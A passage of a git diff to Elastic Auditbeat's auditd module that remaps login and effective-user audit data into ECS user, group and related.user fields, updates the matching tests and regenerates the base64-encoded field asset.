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" } diff --git a/auditbeat/module/auditd/_meta/fields.yml b/auditbeat/module/auditd/_meta/fields.yml index 2d1b778e9558..92e004e3fc16 100644 --- a/auditbeat/module/auditd/_meta/fields.yml +++ b/auditbeat/module/auditd/_meta/fields.yml @@ -14,10 +14,6 @@ type: alias path: user.id migration: true - - name: euid - type: alias - path: user.effective.id - migration: true - name: fsuid type: alias path: user.filesystem.id @@ -30,10 +26,6 @@ type: alias path: user.group.id migration: true - - name: egid - type: alias - path: user.effective.group.id - migration: true - name: sgid type: alias path: user.saved.group.id @@ -57,10 +49,6 @@ type: alias path: user.name migration: true - - name: euid - type: alias - path: user.effective.name - migration: true - name: fsuid type: alias path: user.filesystem.name @@ -73,10 +61,6 @@ type: alias path: user.group.name migration: true - - name: egid - type: alias - path: user.effective.group.name - migration: true - name: sgid type: alias path: user.saved.group.name diff --git a/auditbeat/module/auditd/audit_linux.go b/auditbeat/module/auditd/audit_linux.go index a2c9e0048774..1cd9133a9179 100644 --- a/auditbeat/module/auditd/audit_linux.go +++ b/auditbeat/module/auditd/audit_linux.go @@ -20,7 +20,6 @@ package auditd import ( "fmt" "os" - "os/user" "runtime" "strconv" "strings" @@ -462,7 +461,7 @@ func filterRecordType(typ auparse.AuditMessageType) bool { case typ == auparse.AUDIT_REPLACE: return true // Messages from 1300-2999 are valid audit message types. - case typ < auparse.AUDIT_USER_AUTH || typ > auparse.AUDIT_LAST_USER_MSG2: + case (typ < auparse.AUDIT_USER_AUTH || typ > auparse.AUDIT_LAST_USER_MSG2) && typ != auparse.AUDIT_LOGIN: return true } @@ -554,35 +553,67 @@ func buildMetricbeatEvent(msgs []*auparse.AuditMessage, config Config) mb.Event normalizeEventFields(auditEvent, out.RootFields) - switch auditEvent.Category { - case aucoalesce.EventTypeUserLogin: - // Set ECS user fields from the attempted login account. - if usernameOrID := auditEvent.Summary.Actor.Secondary; usernameOrID != "" { - if usr, err := resolveUsernameOrID(usernameOrID); err == nil { - out.RootFields.Put("user.name", usr.Username) - out.RootFields.Put("user.id", usr.Uid) - } else { - // The login account doesn't exists. Treat it as a user name - out.RootFields.Put("user.name", usernameOrID) - out.RootFields.Delete("user.id") + // User set for related.user + var userSet common.StringSet + if config.ResolveIDs { + userSet = make(common.StringSet) + } + + // Copy user.*/group.* fields from event + setECSEntity := func(key string, ent aucoalesce.ECSEntityData, root common.MapStr, set common.StringSet) { + if ent.ID == "" && ent.Name == "" { + return + } + if ent.ID == uidUnset { + ent.ID = "" + } + nameField := key + ".name" + idField := key + ".id" + if ent.ID != "" { + root.Put(idField, ent.ID) + } else { + root.Delete(idField) + } + if ent.Name != "" { + root.Put(nameField, ent.Name) + if set != nil { + set.Add(ent.Name) } + } else { + root.Delete(nameField) } } - return out -} + setECSEntity("user", auditEvent.ECS.User.ECSEntityData, out.RootFields, userSet) + setECSEntity("user.effective", auditEvent.ECS.User.Effective, out.RootFields, userSet) + setECSEntity("user.target", auditEvent.ECS.User.Target, out.RootFields, userSet) + setECSEntity("user.changes", auditEvent.ECS.User.Changes, out.RootFields, userSet) + setECSEntity("group", auditEvent.ECS.Group, out.RootFields, nil) -func resolveUsernameOrID(userOrID string) (usr *user.User, err error) { - usr, err = user.Lookup(userOrID) - if err == nil { - // User found by name - return + if userSet != nil { + if userSet.Count() != 0 { + out.RootFields.Put("related.user", userSet.ToSlice()) + } } - if _, ok := err.(user.UnknownUserError); !ok { - // Lookup failed by a reason other than user not found - return + getStringField := func(key string, m common.MapStr) (str string) { + if asIf, _ := m.GetValue(key); asIf != nil { + str, _ = asIf.(string) + } + return str } - return user.LookupId(userOrID) + + // Remove redundant user.effective.* when it's the same as user.* + removeRedundantEntity := func(target, original string, m common.MapStr) bool { + for _, suffix := range []string{".id", ".name"} { + if value := getStringField(original+suffix, m); value != "" && getStringField(target+suffix, m) == value { + m.Delete(target) + return true + } + } + return false + } + removeRedundantEntity("user.effective", "user", out.RootFields) + return out } func normalizeEventFields(event *aucoalesce.Event, m common.MapStr) { diff --git a/auditbeat/module/auditd/audit_linux_test.go b/auditbeat/module/auditd/audit_linux_test.go index ec0997ef3407..17d8a25acb3b 100644 --- a/auditbeat/module/auditd/audit_linux_test.go +++ b/auditbeat/module/auditd/audit_linux_test.go @@ -24,7 +24,6 @@ import ( "io/ioutil" "os" "os/exec" - "os/user" "sort" "strings" "testing" @@ -141,20 +140,20 @@ func TestLoginType(t *testing.T) { for idx, expected := range []common.MapStr{ { - "event.category": []string{"authentication"}, - "event.type": []string{"start", "authentication_failure"}, - "event.outcome": "failure", - "user.name": "(invalid user)", - "user.id": nil, - "session": nil, + "event.category": []string{"authentication"}, + "event.type": []string{"start", "authentication_failure"}, + "event.outcome": "failure", + "user.effective.name": "(invalid user)", + "user.id": nil, + "session": nil, }, { - "event.category": []string{"authentication"}, - "event.type": []string{"start", "authentication_success"}, - "event.outcome": "success", - "user.name": "adrian", - "user.audit.id": nil, - "auditd.session": nil, + "event.category": []string{"authentication"}, + "event.type": []string{"start", "authentication_success"}, + "event.outcome": "success", + "user.effective.name": "adrian", + "user.audit.id": nil, + "auditd.session": nil, }, { "event.category": []string{"authentication"}, @@ -355,36 +354,12 @@ func assertNoErrors(t *testing.T, events []mb.Event) { for _, e := range events { t.Log(e) - if e.Error != nil { + if !assert.Nil(t, e.Error) { t.Errorf("received error: %+v", e.Error) } - } -} - -func BenchmarkResolveUsernameOrID(b *testing.B) { - for _, query := range []struct { - input string - name string - id string - err bool - }{ - {input: "0", name: "root", id: "0"}, - {input: "root", name: "root", id: "0"}, - {input: "vagrant", name: "vagrant", id: "1000"}, - {input: "1000", name: "vagrant", id: "1000"}, - {input: "nonexisting", err: true}, - {input: "9987", err: true}, - } { - b.Run(query.input, func(b *testing.B) { - var usr *user.User - var err error - for i := 0; i < b.N; i++ { - usr, err = resolveUsernameOrID(query.input) - } - if assert.Equal(b, query.err, err != nil, fmt.Sprintf("%v", err)) && !query.err { - assert.Equal(b, query.name, usr.Username) - assert.Equal(b, query.id, usr.Uid) - } - }) + errorMsgKey, err := e.RootFields.GetValue("error.message") + if err == nil && !assert.Nil(t, errorMsgKey) { + t.Errorf("event has error messages: %v", errorMsgKey) + } } } diff --git a/auditbeat/module/auditd/fields.go b/auditbeat/module/auditd/fields.go index 5b23bddb2bbd..33845baec490 100644 --- a/auditbeat/module/auditd/fields.go +++ b/auditbeat/module/auditd/fields.go @@ -32,5 +32,5 @@ func init() { // AssetAuditd returns asset data. // This is the base64 encoded gzipped contents of module/auditd. func AssetAuditd() string { - return "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" + return "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